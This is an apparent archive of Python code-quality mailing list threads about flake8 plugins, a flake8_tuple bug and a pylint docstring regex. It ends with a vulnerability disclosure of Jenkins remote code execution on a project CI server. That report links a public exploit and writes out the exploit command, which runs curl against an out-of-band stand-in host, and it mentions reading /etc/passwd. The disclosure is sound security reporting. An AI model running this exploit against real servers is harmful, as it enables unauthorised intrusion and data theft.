From oscaranomnihe at gmail.com  Sat May  4 19:46:16 2019
From: oscaranomnihe at gmail.com (oscar anomnihe)
Date: Sun, 5 May 2019 00:46:16 +0100
Subject: [code-quality] Flakes8 help on my short codes.
Message-ID: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>

Good day,

How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
Kindly advice

Regards

Oscar

Sent from my iPhone

From tartley at tartley.com  Sun May  5 11:49:54 2019
From: tartley at tartley.com (Jonathan Hartley)
Date: Sun, 05 May 2019 11:49:54 -0400
Subject: [code-quality] Flakes8 help on my short codes.
In-Reply-To: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
References: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
Message-ID: <0def2a8b-2bb9-41c1-b3a1-b08a678a1ca8@www.fastmail.com>

I don't know flake8 well, but one tactic is to wrap the flake8 call in a "lint" script, and do any extra checks you want in there, in Bash. eg looping over files and calling "wc -l" in this case.

Apologies this is not what you asked for.

On Sat, May 4, 2019, at 19:47, oscar anomnihe wrote:
> Good day,
> 
> How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
> Kindly advice
> 
> Regards
> 
> Oscar
> 
> Sent from my iPhone
> _______________________________________________
> code-quality mailing list
> code-quality at python.org
> https://mail.python.org/mailman/listinfo/code-quality
> 

--
Jonathan Hartley +1(507)513-1101
@tartley  <http://tartley.com/>http://tartley.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190505/16541451/attachment.html>

From graffatcolmingov at gmail.com  Sun May  5 11:54:07 2019
From: graffatcolmingov at gmail.com (Ian Stapleton Cordasco)
Date: Sun, 5 May 2019 10:54:07 -0500
Subject: [code-quality] Flakes8 help on my short codes.
In-Reply-To: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
References: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
Message-ID: <CAN-Kwu0Somm=6Bs1mMhD909criMJ4gV8dXC=ywN21B2CQoRuqg@mail.gmail.com>

Flake8 allows you to create a plugin that accepts the parameter
"lines" which will provide you with a list of strings representing all
of the lines in the file (including empty/blank lines). You can then
call "len(lines)" and return an violation if that exceeds 500.

On Sat, May 4, 2019 at 6:47 PM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
>
> Good day,
>
> How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
> Kindly advice
>
> Regards
>
> Oscar
>
> Sent from my iPhone
> _______________________________________________
> code-quality mailing list
> code-quality at python.org
> https://mail.python.org/mailman/listinfo/code-quality

From oscaranomnihe at gmail.com  Sun May  5 12:09:41 2019
From: oscaranomnihe at gmail.com (oscar anomnihe)
Date: Sun, 5 May 2019 17:09:41 +0100
Subject: [code-quality] Flakes8 help on my short codes.
In-Reply-To: <CAN-Kwu0Somm=6Bs1mMhD909criMJ4gV8dXC=ywN21B2CQoRuqg@mail.gmail.com>
References: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
 <CAN-Kwu0Somm=6Bs1mMhD909criMJ4gV8dXC=ywN21B2CQoRuqg@mail.gmail.com>
Message-ID: <2EA79CDE-CD97-4AE2-AC0E-86145897D2CC@gmail.com>

Thanks Ian,

Is there a short sample (one or two lines) code that could make your explanation clearer to me. I will highly appreciate that.

Regard
 Oscar
Sent from my iPhone

> On 5 May 2019, at 4:54 PM, Ian Stapleton Cordasco <graffatcolmingov at gmail.com> wrote:
> 
> Flake8 allows you to create a plugin that accepts the parameter
> "lines" which will provide you with a list of strings representing all
> of the lines in the file (including empty/blank lines). You can then
> call "len(lines)" and return an violation if that exceeds 500.
> 
>> On Sat, May 4, 2019 at 6:47 PM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
>> 
>> Good day,
>> 
>> How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
>> Kindly advice
>> 
>> Regards
>> 
>> Oscar
>> 
>> Sent from my iPhone
>> _______________________________________________
>> code-quality mailing list
>> code-quality at python.org
>> https://mail.python.org/mailman/listinfo/code-quality

From graffatcolmingov at gmail.com  Sun May  5 12:20:10 2019
From: graffatcolmingov at gmail.com (Ian Stapleton Cordasco)
Date: Sun, 5 May 2019 11:20:10 -0500
Subject: [code-quality] Flakes8 help on my short codes.
In-Reply-To: <2EA79CDE-CD97-4AE2-AC0E-86145897D2CC@gmail.com>
References: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
 <CAN-Kwu0Somm=6Bs1mMhD909criMJ4gV8dXC=ywN21B2CQoRuqg@mail.gmail.com>
 <2EA79CDE-CD97-4AE2-AC0E-86145897D2CC@gmail.com>
Message-ID: <CAN-Kwu2gEnZyctB2TXw_9jUMwW6VzHnoN2MjiWy2uDZQe4hUXA@mail.gmail.com>

Unfortunately, there's nothing that short that serves as an example.
There is some documentation around building a plugin, though:
http://flake8.pycqa.org/en/latest/plugin-development/index.html

On Sun, May 5, 2019 at 11:09 AM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
>
> Thanks Ian,
>
> Is there a short sample (one or two lines) code that could make your explanation clearer to me. I will highly appreciate that.
>
> Regard
>  Oscar
> Sent from my iPhone
>
> > On 5 May 2019, at 4:54 PM, Ian Stapleton Cordasco <graffatcolmingov at gmail.com> wrote:
> >
> > Flake8 allows you to create a plugin that accepts the parameter
> > "lines" which will provide you with a list of strings representing all
> > of the lines in the file (including empty/blank lines). You can then
> > call "len(lines)" and return an violation if that exceeds 500.
> >
> >> On Sat, May 4, 2019 at 6:47 PM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
> >>
> >> Good day,
> >>
> >> How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
> >> Kindly advice
> >>
> >> Regards
> >>
> >> Oscar
> >>
> >> Sent from my iPhone
> >> _______________________________________________
> >> code-quality mailing list
> >> code-quality at python.org
> >> https://mail.python.org/mailman/listinfo/code-quality

From oscaranomnihe at gmail.com  Sun May  5 12:21:22 2019
From: oscaranomnihe at gmail.com (oscar anomnihe)
Date: Sun, 5 May 2019 17:21:22 +0100
Subject: [code-quality] Flakes8 help on my short codes.
In-Reply-To: <CAN-Kwu2gEnZyctB2TXw_9jUMwW6VzHnoN2MjiWy2uDZQe4hUXA@mail.gmail.com>
References: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
 <CAN-Kwu0Somm=6Bs1mMhD909criMJ4gV8dXC=ywN21B2CQoRuqg@mail.gmail.com>
 <2EA79CDE-CD97-4AE2-AC0E-86145897D2CC@gmail.com>
 <CAN-Kwu2gEnZyctB2TXw_9jUMwW6VzHnoN2MjiWy2uDZQe4hUXA@mail.gmail.com>
Message-ID: <91297013-8C6C-45A8-9D6A-A9CDA7F6D768@gmail.com>

Thanks so much.

Sent from my iPhone

> On 5 May 2019, at 5:20 PM, Ian Stapleton Cordasco <graffatcolmingov at gmail.com> wrote:
> 
> Unfortunately, there's nothing that short that serves as an example.
> There is some documentation around building a plugin, though:
> http://flake8.pycqa.org/en/latest/plugin-development/index.html
> 
>> On Sun, May 5, 2019 at 11:09 AM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
>> 
>> Thanks Ian,
>> 
>> Is there a short sample (one or two lines) code that could make your explanation clearer to me. I will highly appreciate that.
>> 
>> Regard
>> Oscar
>> Sent from my iPhone
>> 
>>> On 5 May 2019, at 4:54 PM, Ian Stapleton Cordasco <graffatcolmingov at gmail.com> wrote:
>>> 
>>> Flake8 allows you to create a plugin that accepts the parameter
>>> "lines" which will provide you with a list of strings representing all
>>> of the lines in the file (including empty/blank lines). You can then
>>> call "len(lines)" and return an violation if that exceeds 500.
>>> 
>>>> On Sat, May 4, 2019 at 6:47 PM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
>>>> 
>>>> Good day,
>>>> 
>>>> How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
>>>> Kindly advice
>>>> 
>>>> Regards
>>>> 
>>>> Oscar
>>>> 
>>>> Sent from my iPhone
>>>> _______________________________________________
>>>> code-quality mailing list
>>>> code-quality at python.org
>>>> https://mail.python.org/mailman/listinfo/code-quality

From oscaranomnihe at gmail.com  Tue May  7 08:25:18 2019
From: oscaranomnihe at gmail.com (oscar anomnihe)
Date: Tue, 7 May 2019 13:25:18 +0100
Subject: [code-quality] Suspected bug on code
Message-ID: <0FDDCA94-A613-487F-9929-5A4889F9A64B@gmail.com>

Good day,

Is there any reason flakes8_tuple should report the last line of this code below

class ReferralsView(FormView):  # !qa: D101 schema = ReferralsSchema()
 buttons = (Button(name='send_invites', 
title
='Send Invites'), )
Regards
Oscar

Sent from my iPhone
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190507/c489257b/attachment.html>

From asottile+pycqa at umich.edu  Tue May  7 12:29:33 2019
From: asottile+pycqa at umich.edu (Anthony Sottile)
Date: Tue, 7 May 2019 09:29:33 -0700
Subject: [code-quality] Suspected bug on code
In-Reply-To: <mailman.36.1557244803.27280.code-quality@python.org>
References: <mailman.36.1557244803.27280.code-quality@python.org>
Message-ID: <CA+dzEBnatA1kP+vwWrONEByPAq+7m6vQEiWGACOQVfY-hSE=Hg@mail.gmail.com>

> Is there any reason flakes8_tuple should report the last line of this code below
>
> class ReferralsView(FormView):  # !qa: D101 schema = ReferralsSchema()
>  buttons = (Button(name='send_invites',
> title
> ='Send Invites'), )

Looks like a bug to me, their bug tracker is at
https://github.com/ar4s/flake8_tuple.

Though this code looks pretty weird and not how I'd format it.  Maybe
something like this?

class ReferralsView(FormView):  # !qa: D101 schema = ReferralsSchema()
    buttons = (
        Button(
            name='send_invites',
            title='Send Invites',
        ),
    )

Anthony

From me at jamescooke.info  Wed May  8 05:54:19 2019
From: me at jamescooke.info (James Cooke)
Date: Wed, 08 May 2019 05:54:19 -0400
Subject: [code-quality] Flakes8 help on my short codes.
In-Reply-To: <91297013-8C6C-45A8-9D6A-A9CDA7F6D768@gmail.com>
References: <AFBAA432-FE3C-4BD2-8A9F-AE90C2B26BF1@gmail.com>
 <CAN-Kwu0Somm=6Bs1mMhD909criMJ4gV8dXC=ywN21B2CQoRuqg@mail.gmail.com>
 <2EA79CDE-CD97-4AE2-AC0E-86145897D2CC@gmail.com>
 <CAN-Kwu2gEnZyctB2TXw_9jUMwW6VzHnoN2MjiWy2uDZQe4hUXA@mail.gmail.com>
 <91297013-8C6C-45A8-9D6A-A9CDA7F6D768@gmail.com>
Message-ID: <693ca9c1-45a3-434a-9dd2-3de99d1d53c5@www.fastmail.com>

Hi Oscar,

Just to echo what the others have said, yes this is doable with a plugin that
checks the `lines` parameter.

Over the last year or so I've been working on a Flake8 plugin. I used Ian's
documentation for plugin development **plus** I referred a lot to flake8-author
(https://github.com/jparise/flake8-author/) a small plugin that I found.

My plugin uses both lines and AST passed from Flake8 - here
https://github.com/jamescooke/flake8-aaa/blob/master/src/flake8_aaa/checker.py#L24
you can see the `Checker.__init__()` has the `lines` parameter Ian mentioned.
This means that Flake8 passes the lines in each file it checks when
initialising the class. That will then allow you to build a `run()` function to
count those lines and raise errors as required.

I also found that pytest-flake8dir
(https://github.com/adamchainz/pytest-flake8dir) was helpful when I was getting
started, although I don't use it any more.

Hope that's helpful.

Cheers,

James



On Sun, 5 May 2019, at 5:42 PM, oscar anomnihe wrote:
> Thanks so much.
> 
> Sent from my iPhone
> 
> > On 5 May 2019, at 5:20 PM, Ian Stapleton Cordasco <graffatcolmingov at gmail.com> wrote:
> > 
> > Unfortunately, there's nothing that short that serves as an example.
> > There is some documentation around building a plugin, though:
> > http://flake8.pycqa.org/en/latest/plugin-development/index.html
> > 
> >> On Sun, May 5, 2019 at 11:09 AM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
> >> 
> >> Thanks Ian,
> >> 
> >> Is there a short sample (one or two lines) code that could make your explanation clearer to me. I will highly appreciate that.
> >> 
> >> Regard
> >> Oscar
> >> Sent from my iPhone
> >> 
> >>> On 5 May 2019, at 4:54 PM, Ian Stapleton Cordasco <graffatcolmingov at gmail.com> wrote:
> >>> 
> >>> Flake8 allows you to create a plugin that accepts the parameter
> >>> "lines" which will provide you with a list of strings representing all
> >>> of the lines in the file (including empty/blank lines). You can then
> >>> call "len(lines)" and return an violation if that exceeds 500.
> >>> 
> >>>> On Sat, May 4, 2019 at 6:47 PM oscar anomnihe <oscaranomnihe at gmail.com> wrote:
> >>>> 
> >>>> Good day,
> >>>> 
> >>>> How can I get flakes8 plugin to yell at me when I exceed 500 lines of code(not individual lines)? I need it to help me not exceed 500 lines of code.
> >>>> Kindly advice
> >>>> 
> >>>> Regards
> >>>> 
> >>>> Oscar
> >>>> 
> >>>> Sent from my iPhone
> >>>> _______________________________________________
> >>>> code-quality mailing list
> >>>> code-quality at python.org
> >>>> https://mail.python.org/mailman/listinfo/code-quality
> _______________________________________________
> code-quality mailing list
> code-quality at python.org
> https://mail.python.org/mailman/listinfo/code-quality
>

From bassam.khouri at gmail.com  Wed May 29 11:22:44 2019
From: bassam.khouri at gmail.com (Bassam Khouri)
Date: Wed, 29 May 2019 11:22:44 -0400
Subject: [code-quality] pylint --no-docstring-rgx issues
Message-ID: <CAPeymodtqg4uVho7k_yX7s9EOqBdqEfJdfJadUigdcE8rQd8dQ@mail.gmail.com>

Hi,

I'm trying to configure the no-docstring-rgx option to ignore function and
class names that:
- Starts with _
- Starts with test_
- Ends with tests
- Ends with Tests

I came up with the following regular expression:

(^(test)?_)|((T|t)ests$)


When I test the regular expression on https://regex101.com/r/3BXmsa/6, it
matches the text I expect it to match.

However, when I run pylint against my code, it still reports a docstring is
missing for a class name that ends with Tests.

For example, if I have the following python 3 code.

import unittest


class _Utils(unittest.TestCase):
    pass


class Test_Foo(unittest.TestCase):
    pass


class test_Foo(unittest.TestCase):
    pass


class UtilsTests(unittest.TestCase):

    def test_function_name(self):
        pass

    def _foo(self):
        pass

    def my_tests(self):
        pass


if __name__ == "__main__":
    unittest.main()


Running pylint --disable=all --enable=missing-docstring
--no-docstring-rgx='(^(test)?_)|((T|t)ests$)' ./test.py yields

$ pylint --disable=all --enable=missing-docstring
--no-docstring-rgx='(^(test)?_)|((T|t)ests$)' ./test.py

************* Module test

test.py:1:0: C0111: Missing module docstring (missing-docstring)

test.py:8:0: C0111: Missing class docstring (missing-docstring)

test.py:16:0: C0111: Missing class docstring (missing-docstring)

test.py:24:4: C0111: Missing method docstring (missing-docstring)


------------------------------------------------------------------

Your code has been rated at 7.50/10 (previous run: 7.50/10, +0.00)


I was only expecting to see the Missing module docstring violation, and the
missing class docstring on line 8.

Here is my environment:

$ pylint --version

pylint 2.3.1

astroid 2.2.5

Python 3.7.3 (default, Mar 27 2019, 09:23:15)

[Clang 10.0.1 (clang-1001.0.46.3)]

Any ideas what is going on and how to fix it?

Cheers,

Bassam
---
"What we can or cannot do, what we consider possible or impossible, is
rarely a function of our true capability. It is more likely a function of
our beliefs about who we are." - Tony Robbins
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190529/1ad84895/attachment.html>

From aihq at vng.com.vn  Wed May 15 22:45:39 2019
From: aihq at vng.com.vn (=?utf-8?B?w4FpLiBI4buTIFF14buRYw==?=)
Date: Thu, 16 May 2019 02:45:39 +0000
Subject: [code-quality] [Security] Jenkins Unauthenticated RCE on
 https://ci.pycqa.org/
Message-ID: <HK0PR02MB26126B43095BBB5DE81BA7DBED0A0@HK0PR02MB2612.apcprd02.prod.outlook.com>

Dear Sir/Madam,

While Searching Jenkins Dashboard I discovered that this domain (https://ci.pycqa.org/) vulnerable to this CVEs (CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029) allow attacker can execute arbitrary command commands on a target operating system.

Steps To Reproduce:
Download the exploit (https://github.com/orangetw/awesome-jenkins-rce-2019) and issue the command below:

python2.7 exp.py https://ci.pycqa.org/ "curl myserver.ip/oob/"

Then I check my server to verify that command executed.(see attached images for POC about content of /etc/passwd file )


Best regards,
-j3ssie-
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2019-05-15 at 16.59.44.png
Type: image/png
Size: 33937 bytes
Desc: Screen Shot 2019-05-15 at 16.59.44.png
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0003.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2019-05-15 at 16.59.06.png
Type: image/png
Size: 311066 bytes
Desc: Screen Shot 2019-05-15 at 16.59.06.png
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0004.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2019-05-15 at 16.58.20.png
Type: image/png
Size: 30418 bytes
Desc: Screen Shot 2019-05-15 at 16.58.20.png
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0005.png>